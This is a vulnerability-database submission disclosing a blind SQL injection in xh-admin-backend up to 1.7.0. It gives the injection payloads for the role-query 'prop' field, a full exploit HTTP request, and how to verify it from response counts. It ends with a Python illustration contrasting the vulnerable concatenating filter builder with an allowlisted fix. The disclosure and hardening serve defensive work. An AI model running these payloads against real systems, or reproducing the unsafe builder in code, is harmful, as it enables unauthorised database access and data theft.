| Title | Alixhan xh-admin ≤ v1.7.0 SQL Injection |
|---|
| Description | Title: SQL Injection Vulnerability in xh-admin ≤ v1.7.0
BUG_Author: sageee
Affected Version: xh-admin ≤ v1.7.0
Vendor: Alixhan GitHub Repository
Software: xh-admin-backend
Vulnerability URL:
● /frontend-api/system-service/api/system/role/query
Description:
1. SQL Injection via Role Query:
● In the xh-admin-backend system, the endpoint /frontend-api/system-service/api/system/role/query allows users to query role information.
● The application fails to properly sanitize user-controlled input within the JSON body. Specifically, the prop parameter inside the filters array is directly concatenated into the backend SQL execution statement.
● This creates a SQL injection vulnerability where attackers can inject arbitrary SQL commands.
2. Exploiting the SQL Injection:
● By manipulating the prop field, an attacker can modify the WHERE clause of the database query.
● This vulnerability allows for Boolean-based Blind SQL Injection. An attacker can infer database content by injecting conditional statements (e.g., AND 1=1 vs AND 1=2) and observing the difference in the response (specifically the total count or returned data list).
● Successful exploitation can lead to unauthorized data retrieval, schema enumeration, or potentially full database compromise.
3. Example SQL Injection Payload:
● The injection occurs by breaking out of the existing SQL context (likely wrapped in backticks) and injecting logic.
● Payload for True Condition:
"prop": "id` = `id` and 1=1 and `id"
● Payload for False Condition:
"prop": "id` = `id` and 1=2 and `id"
4. Requesting the Endpoint:
● Send a POST request to the target system with the malicious JSON payload.
True Case Request:
POST /frontend-api/system-service/api/system/role/query HTTP/1.1
Host: <target-ip>
Content-Type: application/json;charset=UTF-8

{
  "isExport": false,
  "isPage": true,
  "currentPage": 1,
  "pageSize": 20,
  "param": { },
  "filters": [
    {
      "prop": "id` = `id` and 1=1 and `id",
      "condition": "eq",
      "value1": 1
    }
  ]
}
5. Verifying the Exploit:
● Verification is confirmed by comparing the server responses for the True and False payloads:
○ When 1=1 is injected: The server responds with HTTP 200 and returns valid data (e.g., total: 1 and a populated list array), indicating the SQL query remained valid and true.
○ When 1=2 is injected: The server responds with HTTP 200 but returns empty data (e.g., total: 0 and an empty list array), indicating the SQL condition was forced to false.
● This behavioral difference proves that the user input is being executed as SQL logic. |
|---|
| User | sageee (UID 82251) |
|---|
| Submission | 02/06/2026 06:17 (4 months ago) |
|---|
| Moderation | 02/18/2026 08:43 (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 346461 [Alixhan xh-admin-backend up to 1.7.0 Database Query query prop sql injection] |
|---|
| Points | 17 |
|---|
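As an added illustration, not code from xh-admin-backend or from the submitter, here is a small Python/SQLite model of the filter-to-WHERE step the description above is about: `build_where_unsafe` concatenates `prop` into backtick-quoted SQL the way the advisory describes, and `build_where_safe` is the hardened form (identifier allowlist, fixed operator map, values only as bind parameters) that removes the boolean oracle. The `sys_role` table, its column allowlist and the condition map other than `eq` are constructed for this example; the real schema is not on the page.

```python
import re
import sqlite3

# Constructed allowlist for this example; the real sys_role schema is not on the page.
ROLE_COLUMNS = {"id", "name", "code", "status"}
# "condition" values mapped to operators ("eq" is from the page, the rest constructed).
CONDITIONS = {"eq": "=", "ne": "<>", "like": "LIKE"}
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")

def build_where_unsafe(filters):
    """The flaw the advisory describes: prop is dropped into backtick-quoted SQL,
    so a prop value containing a backtick breaks out of the identifier context."""
    clauses, params = [], []
    for f in filters:
        clauses.append(f"`{f['prop']}` {CONDITIONS[f['condition']]} ?")
        params.append(f["value1"])
    return " AND ".join(clauses), params

def build_where_safe(filters, allowed=ROLE_COLUMNS):
    """Hardened form: prop must be a plain identifier AND on the allowlist, the
    operator comes from a fixed map, and values only ever travel as bind parameters."""
    clauses, params = [], []
    for f in filters:
        prop, cond = f["prop"], f["condition"]
        if not isinstance(prop, str) or not IDENT_RE.match(prop) or prop not in allowed:
            raise ValueError(f"rejected filter column: {prop!r}")
        if cond not in CONDITIONS:
            raise ValueError(f"rejected condition: {cond!r}")
        clauses.append(f"`{prop}` {CONDITIONS[cond]} ?")
        params.append(f["value1"])
    return " AND ".join(clauses), params

def query_roles(filters, builder):
    """Count matching rows in a constructed one-row table. SQLite accepts backtick
    identifiers, so the page's payload behaves here exactly as described."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sys_role (id INTEGER, name TEXT, code TEXT, status INTEGER)")
    con.execute("INSERT INTO sys_role VALUES (1, 'admin', 'ADMIN', 1)")
    where, params = builder(filters)
    return con.execute(f"SELECT COUNT(*) FROM sys_role WHERE {where}", params).fetchone()[0]

def filter_is_accepted(filters):
    """True when the hardened builder accepts every filter, False when it rejects one."""
    try:
        build_where_safe(filters)
        return True
    except ValueError:
        return False
```

With the unsafe builder the two payloads from the description yield counts of 1 and 0 (the oracle), while the safe builder rejects both before any SQL is built and still serves legitimate filters such as `{"prop": "name", "condition": "eq", "value1": "admin"}`.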